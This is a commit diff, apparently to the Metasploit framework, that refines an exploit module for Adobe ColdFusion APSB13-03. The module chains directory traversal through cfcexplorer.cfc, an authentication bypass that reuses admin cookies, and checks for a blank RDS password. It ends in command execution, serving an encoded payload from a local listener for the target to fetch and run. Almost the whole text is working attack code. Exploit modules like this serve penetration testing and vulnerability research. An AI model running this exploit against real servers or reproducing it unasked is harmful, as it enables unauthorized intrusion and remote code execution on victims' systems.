Adding most suggested changes to jhart's adobe module

bug/bundler_fix
Tod Beardsley 2013-04-09 17:55:28 -05:00
parent 522642a65d
commit 90e986860e
1 changed files with 22 additions and 18 deletions

View File

@ -19,23 +19,18 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Adobe ColdFusion APSB13-03', 'Name' => 'Adobe ColdFusion APSB13-03',
'Description' => %q{ 'Description' => %q{
This module exploits a pile of vulnerabilities in Adobe ColdFusion APSB13-03: This module exploits a pile of vulnerabilities in Adobe ColdFusion APSB13-03:
* CVE-2013-0625: arbitrary command execution in scheduleedit.cfm (9.x only) CVE-2013-0625 (arbitrary command execution in scheduleedit.cfm (9.x only)),
* CVE-2013-0629: directory traversal CVE-2013-0629 (directory traversal), and CVE-2013-0632 (authentication bypass)
* CVE-2013-0632: authentication bypass
}, },
'Author' => 'Author' =>
[ [
'Jon Hart <jon_hart[at]rapid7.com', # Metasploit module 'Jon Hart <jon_hart[at]rapid7.com>', # Metasploit module
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
[ [
[ 'CVE', '2013-0625'], [ 'CVE', '2013-0625'],
[ 'CVE', '2013-0629'], [ 'CVE', '2013-0629'],
# we don't actually exploit this, as this is the backdoor
# dropped by malware exploiting the other vulnerabilities
[ 'CVE', '2013-0631'],
[ 'CVE', '2013-0632'],
], ],
'Targets' => 'Targets' =>
[ [
@ -50,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
], ],
'DefaultTarget' => 1, 'DefaultTarget' => 1,
'Privileged' => true, 'Privileged' => true,
'Platform' => [ 'win', 'linux' ], 'Platform' => [ 'win', 'linux', 'unix' ],
'DisclosureDate' => 'Jan 15 2013')) 'DisclosureDate' => 'Jan 15 2013'))
register_options( register_options(
@ -103,7 +98,13 @@ class Metasploit3 < Msf::Exploit::Remote
# if we managed to login, get the listener ready # if we managed to login, get the listener ready
datastore['URIPATH'] = rand_text_alphanumeric(6) datastore['URIPATH'] = rand_text_alphanumeric(6)
srv_uri = "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}" if (datastore['SRVHOST'] == "0.0.0.0")
srv_host = Rex::Socket.source_address(rhost)
else
srv_host = datastore['SRVHOST']
end
srv_port = datastore['SRVPORT'] || 80
srv_uri = "http://#{srv_host}:#{srv_port}"
start_service start_service
# drop a payload on disk which we can used to execute # drop a payload on disk which we can used to execute
@ -154,7 +155,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def on_request_uri cli, request def on_request_uri cli, request
cf_payload = "test"
case request.uri case request.uri
when "/#{datastore['URIPATH']}-e" when "/#{datastore['URIPATH']}-e"
cf_payload = <<-EOF cf_payload = <<-EOF
@ -165,6 +165,8 @@ class Metasploit3 < Msf::Exploit::Remote
EOF EOF
when "/#{datastore['URIPATH']}-p" when "/#{datastore['URIPATH']}-p"
cf_payload = payload.encoded cf_payload = payload.encoded
else
cf_payload = "test"
end end
send_response(cli, cf_payload, { 'Content-Type' => 'text/html' }) send_response(cli, cf_payload, { 'Content-Type' => 'text/html' })
end end
@ -216,9 +218,9 @@ class Metasploit3 < Msf::Exploit::Remote
'connection' => 'TE, close', 'connection' => 'TE, close',
'cookie' => build_cookie_header(cookie_hash), 'cookie' => build_cookie_header(cookie_hash),
}) })
cookie_hash.merge! get_useful_cookies res
if res if res
cookie_hash.merge! get_useful_cookies res
# XXX: I can only seem to get this to work if 'Enable Session Variables' # XXX: I can only seem to get this to work if 'Enable Session Variables'
# is disabled (Server Settings -> Memory Variables) # is disabled (Server Settings -> Memory Variables)
token = res.body.scan(/<input type="hidden" name="csrftoken" value="([^\"]+)"/).flatten.first token = res.body.scan(/<input type="hidden" name="csrftoken" value="([^\"]+)"/).flatten.first
@ -541,7 +543,7 @@ class Metasploit3 < Msf::Exploit::Remote
# was just wide open # was just wide open
vuln_without_creds = false vuln_without_creds = false
paths.each do |path| paths.each do |path|
if (traverse_read path, nil) =~ /ADOBE SYSTEMS INCORPORATED/ if traverse_read(path, nil) =~ /ADOBE SYSTEMS INCORPORATED/
vulns += 1 vulns += 1
vuln_without_creds = true vuln_without_creds = true
break break
@ -559,7 +561,7 @@ class Metasploit3 < Msf::Exploit::Remote
vuln_without_bypass = false vuln_without_bypass = false
paths.each do |path| paths.each do |path|
cf_cookies = componentutils_login datastore['USERNAME'], datastore['PASSWORD'] cf_cookies = componentutils_login datastore['USERNAME'], datastore['PASSWORD']
if (traverse_read path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/ if traverse_read(path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/
vulns += 1 vulns += 1
vuln_without_bypass = true vuln_without_bypass = true
break break
@ -581,7 +583,7 @@ class Metasploit3 < Msf::Exploit::Remote
# and use it for CFAUTHORIZATION_componentutils # and use it for CFAUTHORIZATION_componentutils
cf_cookies['CFAUTHORIZATION_componentutils'] = cf_cookies['CFAUTHORIZATION_cfadmin'] cf_cookies['CFAUTHORIZATION_componentutils'] = cf_cookies['CFAUTHORIZATION_cfadmin']
cf_cookies.delete 'CFAUTHORIZATION_cfadmin' cf_cookies.delete 'CFAUTHORIZATION_cfadmin'
if (traverse_read path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/ if traverse_read(path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/
vulns += 1 vulns += 1
vuln_with_bypass = true vuln_with_bypass = true
break break
@ -604,7 +606,7 @@ class Metasploit3 < Msf::Exploit::Remote
# the vulnerability for CVE-2013-0632 is that if RDS is disabled during install but # the vulnerability for CVE-2013-0632 is that if RDS is disabled during install but
# subsequently *enabled* after install, the password is unset so we simply must # subsequently *enabled* after install, the password is unset so we simply must
# check that and only that. # check that and only that.
cf_cookies = adminapi_login 'foo', 'bar', true cf_cookies = adminapi_login Rex::Text.rand_text_alpha(4), Rex::Text.rand_text_alpha(4), true
if cf_cookies.empty? if cf_cookies.empty?
print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0632" print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0632"
else else
@ -617,7 +619,7 @@ class Metasploit3 < Msf::Exploit::Remote
false false
end end
def traverse_read path, cookies def traverse_read(path, cookies)
uri = normalize_uri(target_uri.path) uri = normalize_uri(target_uri.path)
uri << "CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path=" uri << "CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path="
uri << path uri << path
@ -628,6 +630,8 @@ class Metasploit3 < Msf::Exploit::Remote
'connection' => 'TE, close', 'connection' => 'TE, close',
'cookie' => build_cookie_header(cookies) 'cookie' => build_cookie_header(cookies)
}) })
res.body.gsub(/\r\n?/, "\n").gsub(/.<html>.<head>.<title>Component.*/m, '') if res and res.body
res.body.gsub(/\r\n?/, "\n").gsub(/.<html>.<head>.<title>Component.*/m, '')
end
end end
end end